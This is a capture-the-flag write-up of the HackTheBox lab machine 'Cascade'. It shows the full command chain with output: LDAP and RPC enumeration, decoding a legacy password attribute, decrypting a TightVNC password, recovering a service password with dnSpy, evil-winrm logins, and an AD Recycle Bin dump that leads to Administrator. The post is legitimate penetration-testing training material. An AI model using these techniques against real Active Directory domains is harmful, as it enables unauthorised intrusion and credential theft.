---
title: "HTB: Cascade"
date: 2021-07-14
classes: wide
categories:
  - Hackthebox
tag:
  - ldap 
  - tightvnc 
  - dnspy
  - AD recycle bin
  - Active Directory
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/cascade/cascade.png" alt="">

# Summary

Cascade was a challenging machine where you first find credentials for a user through ldap because ldap anonymous is enabled, with these credentials I then have access to an SMB share where there is a tightvnc encrypted password. I then was able to decrypt this password and get access to the machine as s.smith, however running winpeas and bloodhound didn't show anything and I needed to look at the smb share permissions because s.smith has access to the audit$ share. Inside this audit share is a bunch of binaries and a database with an encrypted ldap password for arksvc. I then use dnspy to decompile the binaries and set a breakpoint so that I can stop the application when it decrypts the password and obtain the password in cleartext. With this password I then gain access to the machine through evil-winrm and then notice that arksvc is a member of AD recycle bin which I then use a command from hacktricks to dump the contents of the recycle bin and then find a password for temp admin, which I then base64 decode and then was able to connect as administrator using this password. So without further or do lets being cascade from hackthebox

# Recon

```
└──╼ $cat nmap/initial.txt 
# Nmap 7.91 scan initiated Thu Jun  3 13:51:31 2021 as: nmap -A -oN nmap/initial.txt -Pn 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.030s latency).
Not shown: 987 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-03 12:51:42Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-06-03T12:52:32
|_  start_date: 2021-06-03T12:45:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun  3 13:53:14 2021 -- 1 IP address (1 host up) scanned in 102.37 seconds


```

and all port scan

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/cascade]
└──╼ $nmap -p- -oN nmap/all-ports $ip --min-rate 10000 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 19:13 BST
Nmap scan report for cascade.local (10.10.10.182)
Host is up (0.031s latency).
Not shown: 65525 filtered ports
PORT      STATE SERVICE
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
5985/tcp  open  wsman
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 16.15 seconds
```

# Enumeration of Services

## DNS 53

```
$nslookup
> server 10.10.10.182
Default server: 10.10.10.182
Address: 10.10.10.182#53
> 10.10.10.182
** server can't find 182.10.10.10.in-addr.arpa: SERVFAIL
> 127.0.0.1
1.0.0.127.in-addr.arpa  name = localhost.
> 127.0.0.2
** server can't find 2.0.0.127.in-addr.arpa: NXDOMAIN
> cascade.htb
Server:         10.10.10.182
Address:        10.10.10.182#53

** server can't find cascade.htb: SERVFAIL
> cascade.local
Server:         10.10.10.182
Address:        10.10.10.182#53

Name:   cascade.local
Address: 10.10.10.182
Name:   cascade.local
Address: 10.10.10.183
Name:   cascade.local
Address: dead:beef::8a8:d14d:1d23:bbe2
> 
```

And I tried a dns zone transfer but it didn't work

```
$dig axfr cascade.local @10.10.10.182

; <<>> DiG 9.16.15-Debian <<>> axfr cascade.local @10.10.10.182
;; global options: +cmd
; Transfer failed.
```

## RPC 135

null rpc was enabled and I was able to get a list of users with descriptions, but there were no passwords in the description fields

```
$rpcclient -U '' -N $ip
rpcclient $> querydispinfo
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull     Name: Adrian Turnbull   Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc    Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson       Name: Ben Hanson        Desc: (null)
index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc      Name: BackupSvc Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest      Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman       Name: David Burman      Desc: (null)
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe        Name: Edward Crowe      Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft        Name: Ian Croft Desc: (null)
index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen        Name: Joseph Allen      Desc: (null)
index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand     Name: John Goodhand     Desc: (null)
index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield    Name: James Wakefield   Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson     Name: Ryan Thompson     Desc: (null)
index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson      Name: Stephanie Hickson Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith        Name: Steve Smith       Desc: (null)
index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util   Name: Util      Desc: (null)
```

I then used awk to copy this rpc info so that I could get a list of users on the machine

```
$awk -F [ {'print $2'} tmp | awk -F ] '{print $1'} > users.txt
┌─[purplerabbit@kali]─[~/Documents/htb/cascade]
└──╼ $cat users.txt 
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
```

## As-rep Roasting 

Checking to see if any of these accounts have kerberos pre-authentication enabled showed that none of them did

```
$GetNPUsers.py cascade.local/ -usersfile users.txt -format hashcat -output hashes.asreproast -dc-ip 10.10.10.182
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
```

## LDAP 389

```
$ldapsearch -h $ip -x -b "DC=cascade,DC=local" > ldap.txt
┌─[purplerabbit@kali]─[~/Documents/htb/cascade]
└──╼ $vim ldap.txt 
┌─[purplerabbit@kali]─[~/Documents/htb/cascade]
└──╼ $wc -l ldap.txt 
6363 ldap.txt
```

This gave a lot of output and so I filtered it by user which gave a file a lot less in size making it easier to enumerate.

```
$ldapsearch -h $ip -x -b "DC=cascade,DC=local" "objectclass=user" > user-ldap
$wc -l user-ldap 
715 user-ldap
```

# Shell as s.smith

Eventually I found an interesting entry under Ryan Thompson 

```
cascadeLegacyPwd: clk0bjVldmE=
```

This looked like it was base64 encoded so doing base64 -d gave the password

```
$echo clk0bjVldmE= | base64 -d
rY4n5eva┌─[purplerabbit@kali]─[~/Documents/htb/cascade]
└──╼ $
```

Using this password I was able to access smb but not winrm (likely because this user isn't part of the remote management groups on this machine)
Looking through the shares I had access to showed the following;

```
$smbmap -u r.thompson -p rY4n5eva -H $ip                                                                                                                                                                                                 
[+] IP: 10.10.10.182:445        Name: cascade.local                                                                    
        Disk                                                    Permissions     Comment                                
        ----                                                    -----------     -------                                
        ADMIN$                                                  NO ACCESS       Remote Admin                           
        Audit$                                                  NO ACCESS                                              
        C$                                                      NO ACCESS       Default share                          
        Data                                                    READ ONLY                                              
        IPC$                                                    NO ACCESS       Remote IPC                             
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share 
```

After spending some time enumerating the files in SYSVOL it was a dead end. But the Data share had an interesting file "VNC Install.reg"
```
smb: \IT\tEMP\s.smith\> ls
  .                                   D        0  Tue Jan 28 20:00:01 2020
  ..                                  D        0  Tue Jan 28 20:00:01 2020
  VNC Install.reg                     A     2680  Tue Jan 28 19:27:44 2020

                13106687 blocks of size 4096. 8167341 blocks available
smb: \IT\tEMP\s.smith\> 
```

Looking into this file showed that there was a VNC password inside 

```
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

```

Looking on google if there is anyway to decrypt this password showed that it was possible to decrypt this password 

Following the instructions on this github readme <https://github.com/billchaison/VNCDecrypt> gave the password of "sT333ve2"

```
$echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 000000000000
0000 -d | hexdump -Cv
00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008
```

I was then able to use this password to access s.smith through evil-winrm 

```
$evil-winrm -u s.smith -p sT333ve2 -i $ip

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\s.smith\Documents> whoami
cascade\s.smith
```

# s.smith => arksvc

First I checked to see if there were any SPNs that I could get access to and perform a kerberoast, however there wasn't any 

```
$GetUserSPNs.py -request -dc-ip $ip cascade.local/s.smith -save -o GetUserSPNs.out
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
No entries found!
```

Next I ran winpeas on the machine and after some time of looking and winpeas output it didn't find anything useful.

Next I ran bloodhound and downloaded and imported the zip onto my local kali machine in bloodhound and couldn't find anything.

I should have seen that the s.smith user has read access to the Audit$ share

```
$smbmap -u s.smith -p sT333ve2 -H $ip
[+] IP: 10.10.10.182:445        Name: cascade.local                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  READ ONLY
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share 
```

Enumerating this smb share showed taht there was an sqlite3 database with arksvc's password base64 encoded 

```
$sqlite3 Audit.db 

sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> select * from ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> 
```

doing a base64 decode on this string gave unknown characters that suggested its encrypted somehow. There was nothing else of use in this audit database.

## Decompiling CascAudit.exe using dnspy

dnspy is a debugger and .NET assembly editor that will allow us to decompile the .dll and .exe files we have from the Audit$ share and so some investigation into how it decrypts the autdit database password. To get dnspy we first need to have a windows vm that we can install it on. I have already downloaded and install my windows virtual machine. You can download a windows 10 image from the following link <https://www.microsoft.com/en-gb/evalcenter/evaluate-windows-10-enterprise> with windows 10 download a binary for dnspy from their github linked here <https://github.com/dnSpy/dnSpy/releases> 

Next I ran dnspy and transferred the files to my windows machine, then imported the folder into dnspy and then clicked on the executable main module 

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/cascade/1.png" alt="">

I then noticed that there was a function that decrypts the password, so i set a breakpoint at this point to tell dnspy to run the executable, but stop after this point and then return values that were given.

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/cascade/2.png" alt="">

Doing so I also gave the argument before running as the audit.db database as I guessed that would be an argument. Then I hit skip over after it finished running and it gave me the password for the arksvc user account.

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/cascade/3.png" alt="">

Which then gave the password of "w3lc0meFr31nd"	string. I was then able to access arksvc via evil-winrm using the password shown in dnspy.

```
evil-winrm -u arksvc -p "w3lc0meFr31nd" -i $ip

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\arksvc\Documents> whoami
cascade\arksvc
```


# arksvc => Administrator 

Looking at the groups I was in I was apart of the AD Recycle Bin groups 

```
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
```

Looking online at this group showed that it was an attack vector. Following the command from hacktricks https://book.hacktricks.xyz/windows/active-directory-methodology/privileged-accounts-and-token-privileges#ad-recycle-bin I was able to output the contents of the recycle bin 

```
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *                                                                                                
                                                           
                                                                                                                                                                                                                                              
CanonicalName                   : cascade.local/Deleted Objects                                                        
CN                              : Deleted Objects          
Created                         : 1/9/2020 3:31:39 PM                                                                  
createTimeStamp                 : 1/9/2020 3:31:39 PM                                                                  
Deleted                         : True                                                                                 
Description                     : Default container for deleted objects           
DisplayName                     :                          
DistinguishedName               : CN=Deleted Objects,DC=cascade,DC=local                                               
dSCorePropagationData           : {1/1/1601 12:00:00 AM}                                                               
instanceType                    : 4                                                                                    
isCriticalSystemObject          : True                                          
---snipped---
```

Something immediately jumped out at me and that was 

```
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
```
in the temp admin object.

doing a base64 decode on this string showed that the password for the temp admin account was "baCT3r1aN00dles"

```
$echo -n "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles┌─[purplerabbit@kali]─[~/Documents/htb/cascade]
└──╼ $
```

Using this password I was then able to access the administrator user account

```
$evil-winrm -u administrator -p "baCT3r1aN00dles" -i $ip

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> whoami
cascade\administrator
```

That was root on cascade from hackthebox! Hope you enjoyed! 